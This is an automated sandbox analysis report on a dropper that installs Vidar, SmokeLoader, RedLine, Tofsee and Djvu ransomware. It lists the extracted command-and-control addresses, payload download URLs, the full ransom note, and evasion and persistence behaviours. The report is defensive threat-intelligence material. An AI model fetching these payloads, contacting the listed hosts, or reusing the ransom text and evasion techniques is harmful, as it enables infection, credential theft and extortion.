djvu | c8b0a49e4c8aae835e2d77c0501f50e100d768c4b0bb0b97fb52643f9d6d50c8

Analysis

max time kernel
128s
max time network
179s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
14-03-2022 12:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c8b0a49e4c8aae835e2d77c0501f50e100d768c4b0bb0b97fb52643f9d6d50c8.exe
Size

3.7MB
MD5

98292f576aec371fb30c3678298e1c81
SHA1

008105d81f6505da15f7935c97ce38730ac50a5b
SHA256

c8b0a49e4c8aae835e2d77c0501f50e100d768c4b0bb0b97fb52643f9d6d50c8
SHA512

d888dae22f2f9bd454c53e6c625620de0d8c6077ad2b10283e559f75e33b9d2d3863fef3c67e6d764f2768bc31dd0ec245944d6e189e402c677b3bd795de0f46

Malware Config

Extracted

Family

vidar

Version

39.4

Botnet

706

https://sergeevih43.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32

Extracted

Family

vidar

Version

50.7

Botnet

1177

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes

profile_id
1177

Extracted

Family

redline

185.11.73.22:45202

Attributes

auth_value
4811a2f23005637a45b22c416ef83c5f

Extracted

Family

redline

Botnet

redline

193.106.191.253:4752

Attributes

auth_value
c6b533a917f5c6a3e6d1afd9c29f81c6

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

Installs

94.23.1.92:12857

Attributes

auth_value
c8e146507a5c0004dfcc77a7c5f15bc2

Extracted

Family

redline

Botnet

pizzadlyath

65.108.101.231:14648

Attributes

auth_value
e6050567aab45ec7a388fed4947afdc2

Extracted

Family

redline

Botnet

@ywqmre

185.215.113.24:15994

Attributes

auth_value
5a482aa0be2b5e01649fe7a3ce943422

Signatures

Detected Djvu ransomware 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/616-344-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/616-341-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/616-348-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 14 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1532-239-0x0000000000CA0000-0x0000000000DEE000-memory.dmp	family_redline
behavioral2/memory/1532-267-0x0000000000CA0000-0x0000000000DEE000-memory.dmp	family_redline
behavioral2/memory/1532-270-0x0000000000CA0000-0x0000000000DEE000-memory.dmp	family_redline
behavioral2/memory/1532-301-0x0000000000CA0000-0x0000000000DEE000-memory.dmp	family_redline
behavioral2/memory/2472-326-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/1760-324-0x0000000000720000-0x0000000000740000-memory.dmp	family_redline
behavioral2/memory/860-281-0x0000000000520000-0x00000000006A5000-memory.dmp	family_redline
behavioral2/memory/860-278-0x0000000000520000-0x00000000006A5000-memory.dmp	family_redline
behavioral2/memory/860-276-0x0000000000520000-0x00000000006A5000-memory.dmp	family_redline
behavioral2/memory/1532-247-0x0000000000CA0000-0x0000000000DEE000-memory.dmp	family_redline
behavioral2/memory/1532-235-0x0000000000CA0000-0x0000000000DEE000-memory.dmp	family_redline
behavioral2/memory/2036-356-0x0000000000780000-0x00000000007A0000-memory.dmp	family_redline
behavioral2/memory/3996-352-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/4056-351-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 5 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/4232-198-0x0000000000A20000-0x0000000000ABD000-memory.dmp	family_vidar
behavioral2/memory/4232-208-0x0000000000400000-0x0000000000636000-memory.dmp	family_vidar
behavioral2/memory/4152-308-0x0000000000B30000-0x0000000000DDA000-memory.dmp	family_vidar
behavioral2/memory/4152-268-0x0000000000B30000-0x0000000000DDA000-memory.dmp	family_vidar
behavioral2/memory/4152-264-0x0000000000B30000-0x0000000000DDA000-memory.dmp	family_vidar

ASPack v2.12-2.42 8 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0F88853E\libstdc++-6.dll	aspack_v212_v242

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 40 IoCs

Processes:

setup_installer.exesetup_install.exesotema_2.exesotema_4.exesotema_1.exesotema_3.exesotema_9.exesotema_8.exesotema_6.exesotema_5.exesotema_7.exejfiag3g_gg.exesotema_5.tmpjfiag3g_gg.exeeBakVWk94D0wUhfTMfF9Dc0S.exeWerFault.exe9zp6bm2YJTlbj13a6HIkNrGc.exetimeout.exeGMWfiCB7tB8bpQOnPfqVUmFQ.exekVVfY9rHG8TllcLpgyZTw_MF.exe3dOE3d1sZf_nJ1ibs4cw_woX.exeNNiu__cHUStP7cRauwqxtlal.exeAyL1Nf0UDBpFR_JQ8iZsmZkK.exeH0xRUQKkmCQXV25wXqbpEIcg.exeCk2q4uT6iTaIEd0lvKzbHduR.exee9w9qlGQglAXeOn4N6D4RkOA.exegk1Wob6J3yJXx6KlooXtIyoO.exea9OaEpv23FYgJFvbYtMQLkRf.exeTp76K8lXJutNDPU3GBzruQ17.exeaPxXMysp9421peTm33S09UhF.exet8ZTXQMknI0Bf_T6U2r9mI9y.exea4h4FifFWWhR3hoFoyrXlTxe.exeObNPpajSdivDVdGGrUbrToAT.exeZtXUyQgiFjQYVDgjY29raqAb.exeInstall.exeInstall.exe24aee999-a726-4863-a956-be720f6e68bb.exeH0xRUQKkmCQXV25wXqbpEIcg.exesotema_9.exehmhgeiaz.exe

pid	process
2288	setup_installer.exe
3044	setup_install.exe
1536	sotema_2.exe
2316	sotema_4.exe
4188	sotema_1.exe
4232	sotema_3.exe
3836	sotema_9.exe
1200	sotema_8.exe
1848	sotema_6.exe
632	sotema_5.exe
1148	sotema_7.exe
2608	jfiag3g_gg.exe
3944	sotema_5.tmp
3076	jfiag3g_gg.exe
1532	eBakVWk94D0wUhfTMfF9Dc0S.exe
4744	WerFault.exe
4844	9zp6bm2YJTlbj13a6HIkNrGc.exe
4132	timeout.exe
4252	GMWfiCB7tB8bpQOnPfqVUmFQ.exe
1412	kVVfY9rHG8TllcLpgyZTw_MF.exe
3428	3dOE3d1sZf_nJ1ibs4cw_woX.exe
4244	NNiu__cHUStP7cRauwqxtlal.exe
960	AyL1Nf0UDBpFR_JQ8iZsmZkK.exe
1952	H0xRUQKkmCQXV25wXqbpEIcg.exe
860	Ck2q4uT6iTaIEd0lvKzbHduR.exe
4968	e9w9qlGQglAXeOn4N6D4RkOA.exe
2656	gk1Wob6J3yJXx6KlooXtIyoO.exe
4140	a9OaEpv23FYgJFvbYtMQLkRf.exe
4152	Tp76K8lXJutNDPU3GBzruQ17.exe
100	aPxXMysp9421peTm33S09UhF.exe
2236	t8ZTXQMknI0Bf_T6U2r9mI9y.exe
2436	a4h4FifFWWhR3hoFoyrXlTxe.exe
2960	ObNPpajSdivDVdGGrUbrToAT.exe
1924	ZtXUyQgiFjQYVDgjY29raqAb.exe
2432	Install.exe
3692	Install.exe
2404	24aee999-a726-4863-a956-be720f6e68bb.exe
616	H0xRUQKkmCQXV25wXqbpEIcg.exe
3684	sotema_9.exe
4232	hmhgeiaz.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Documents\a9OaEpv23FYgJFvbYtMQLkRf.exe	upx

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeaPxXMysp9421peTm33S09UhF.exeNNiu__cHUStP7cRauwqxtlal.exea4h4FifFWWhR3hoFoyrXlTxe.exekVVfY9rHG8TllcLpgyZTw_MF.exe9zp6bm2YJTlbj13a6HIkNrGc.exetimeout.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	aPxXMysp9421peTm33S09UhF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	NNiu__cHUStP7cRauwqxtlal.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	NNiu__cHUStP7cRauwqxtlal.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a4h4FifFWWhR3hoFoyrXlTxe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	kVVfY9rHG8TllcLpgyZTw_MF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	kVVfY9rHG8TllcLpgyZTw_MF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9zp6bm2YJTlbj13a6HIkNrGc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a4h4FifFWWhR3hoFoyrXlTxe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	aPxXMysp9421peTm33S09UhF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9zp6bm2YJTlbj13a6HIkNrGc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	timeout.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	timeout.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sotema_1.exeTp76K8lXJutNDPU3GBzruQ17.exehmhgeiaz.exeZtXUyQgiFjQYVDgjY29raqAb.exec8b0a49e4c8aae835e2d77c0501f50e100d768c4b0bb0b97fb52643f9d6d50c8.exesetup_installer.exesotema_7.exee9w9qlGQglAXeOn4N6D4RkOA.exet8ZTXQMknI0Bf_T6U2r9mI9y.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	sotema_1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Tp76K8lXJutNDPU3GBzruQ17.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	hmhgeiaz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	ZtXUyQgiFjQYVDgjY29raqAb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	c8b0a49e4c8aae835e2d77c0501f50e100d768c4b0bb0b97fb52643f9d6d50c8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	sotema_7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	e9w9qlGQglAXeOn4N6D4RkOA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	t8ZTXQMknI0Bf_T6U2r9mI9y.exe

Loads dropped DLL 22 IoCs

Processes:

setup_install.exesotema_2.exesotema_5.tmprUNdlL32.eXe3dOE3d1sZf_nJ1ibs4cw_woX.exeTp76K8lXJutNDPU3GBzruQ17.exegk1Wob6J3yJXx6KlooXtIyoO.exe

pid	process
3044	setup_install.exe
3044	setup_install.exe
3044	setup_install.exe
3044	setup_install.exe
3044	setup_install.exe
1536	sotema_2.exe
3944	sotema_5.tmp
4732	rUNdlL32.eXe
3428	3dOE3d1sZf_nJ1ibs4cw_woX.exe
3428	3dOE3d1sZf_nJ1ibs4cw_woX.exe
3428	3dOE3d1sZf_nJ1ibs4cw_woX.exe
3428	3dOE3d1sZf_nJ1ibs4cw_woX.exe
3428	3dOE3d1sZf_nJ1ibs4cw_woX.exe
3428	3dOE3d1sZf_nJ1ibs4cw_woX.exe
3428	3dOE3d1sZf_nJ1ibs4cw_woX.exe
3428	3dOE3d1sZf_nJ1ibs4cw_woX.exe
3428	3dOE3d1sZf_nJ1ibs4cw_woX.exe
3428	3dOE3d1sZf_nJ1ibs4cw_woX.exe
4152	Tp76K8lXJutNDPU3GBzruQ17.exe
4152	Tp76K8lXJutNDPU3GBzruQ17.exe
2656	gk1Wob6J3yJXx6KlooXtIyoO.exe
2656	gk1Wob6J3yJXx6KlooXtIyoO.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

t8ZTXQMknI0Bf_T6U2r9mI9y.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\zwegvfvq = "\"C:\\Users\\Admin\\hmhgeiaz.exe\""	t8ZTXQMknI0Bf_T6U2r9mI9y.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

NNiu__cHUStP7cRauwqxtlal.exea4h4FifFWWhR3hoFoyrXlTxe.exekVVfY9rHG8TllcLpgyZTw_MF.exeaPxXMysp9421peTm33S09UhF.exe9zp6bm2YJTlbj13a6HIkNrGc.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	NNiu__cHUStP7cRauwqxtlal.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	a4h4FifFWWhR3hoFoyrXlTxe.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	kVVfY9rHG8TllcLpgyZTw_MF.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	aPxXMysp9421peTm33S09UhF.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9zp6bm2YJTlbj13a6HIkNrGc.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

27 ipinfo.io
168 ipinfo.io
169 ipinfo.io
24 ip-api.com
26 ipinfo.io
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

eBakVWk94D0wUhfTMfF9Dc0S.exeCk2q4uT6iTaIEd0lvKzbHduR.exeTp76K8lXJutNDPU3GBzruQ17.exe

pid process

1532 eBakVWk94D0wUhfTMfF9Dc0S.exe
860 Ck2q4uT6iTaIEd0lvKzbHduR.exe
4152 Tp76K8lXJutNDPU3GBzruQ17.exe

flow	ioc
27	ipinfo.io
168	ipinfo.io
169	ipinfo.io
24	ip-api.com
26	ipinfo.io

pid	process
1532	eBakVWk94D0wUhfTMfF9Dc0S.exe
860	Ck2q4uT6iTaIEd0lvKzbHduR.exe
4152	Tp76K8lXJutNDPU3GBzruQ17.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

9zp6bm2YJTlbj13a6HIkNrGc.exeWerFault.exeH0xRUQKkmCQXV25wXqbpEIcg.exea4h4FifFWWhR3hoFoyrXlTxe.exekVVfY9rHG8TllcLpgyZTw_MF.exeNNiu__cHUStP7cRauwqxtlal.exetimeout.exeaPxXMysp9421peTm33S09UhF.exesotema_9.exe

description	pid	process	target process
PID 4844 set thread context of 1760	4844	9zp6bm2YJTlbj13a6HIkNrGc.exe	AppLaunch.exe
PID 4744 set thread context of 2472	4744	WerFault.exe	AppLaunch.exe
PID 1952 set thread context of 616	1952	H0xRUQKkmCQXV25wXqbpEIcg.exe	H0xRUQKkmCQXV25wXqbpEIcg.exe
PID 2436 set thread context of 3996	2436	a4h4FifFWWhR3hoFoyrXlTxe.exe	AppLaunch.exe
PID 1412 set thread context of 4056	1412	kVVfY9rHG8TllcLpgyZTw_MF.exe	AppLaunch.exe
PID 4244 set thread context of 2036	4244	NNiu__cHUStP7cRauwqxtlal.exe	AppLaunch.exe
PID 4132 set thread context of 988	4132	timeout.exe	AppLaunch.exe
PID 100 set thread context of 3672	100	aPxXMysp9421peTm33S09UhF.exe	AppLaunch.exe
PID 3836 set thread context of 3684	3836	sotema_9.exe	sotema_9.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 15 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4060	4232	WerFault.exe	sotema_3.exe
4920	4732	WerFault.exe	rUNdlL32.eXe
4920	960	WerFault.exe
2036	4252	WerFault.exe
4840	4252	WerFault.exe
3816	960	WerFault.exe	AyL1Nf0UDBpFR_JQ8iZsmZkK.exe
1728	616	WerFault.exe	H0xRUQKkmCQXV25wXqbpEIcg.exe
4248	960	WerFault.exe	AyL1Nf0UDBpFR_JQ8iZsmZkK.exe
3308	960	WerFault.exe	AyL1Nf0UDBpFR_JQ8iZsmZkK.exe
2496	2236	WerFault.exe	t8ZTXQMknI0Bf_T6U2r9mI9y.exe
4744	960	WerFault.exe	AyL1Nf0UDBpFR_JQ8iZsmZkK.exe
1472	960	WerFault.exe	AyL1Nf0UDBpFR_JQ8iZsmZkK.exe
2380	4232	WerFault.exe	hmhgeiaz.exe
3168	960	WerFault.exe	AyL1Nf0UDBpFR_JQ8iZsmZkK.exe
5064	960	WerFault.exe	AyL1Nf0UDBpFR_JQ8iZsmZkK.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

sotema_2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sotema_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sotema_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sotema_2.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3dOE3d1sZf_nJ1ibs4cw_woX.exegk1Wob6J3yJXx6KlooXtIyoO.exeTp76K8lXJutNDPU3GBzruQ17.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3dOE3d1sZf_nJ1ibs4cw_woX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3dOE3d1sZf_nJ1ibs4cw_woX.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	gk1Wob6J3yJXx6KlooXtIyoO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	gk1Wob6J3yJXx6KlooXtIyoO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Tp76K8lXJutNDPU3GBzruQ17.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Tp76K8lXJutNDPU3GBzruQ17.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1340 schtasks.exe
4432 schtasks.exe
Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

3596 timeout.exe
3680 timeout.exe
4560 timeout.exe
4132 timeout.exe
932 timeout.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1564 taskkill.exe
4044 taskkill.exe
3168 taskkill.exe
Modifies registry class 1 IoCs

Processes:

sotema_1.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ sotema_1.exe

pid	process
1340	schtasks.exe
4432	schtasks.exe

pid	process
3596	timeout.exe
3680	timeout.exe
4560	timeout.exe
4132	timeout.exe
932	timeout.exe

pid	process
1564	taskkill.exe
4044	taskkill.exe
3168	taskkill.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	sotema_1.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

sotema_3.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	sotema_3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8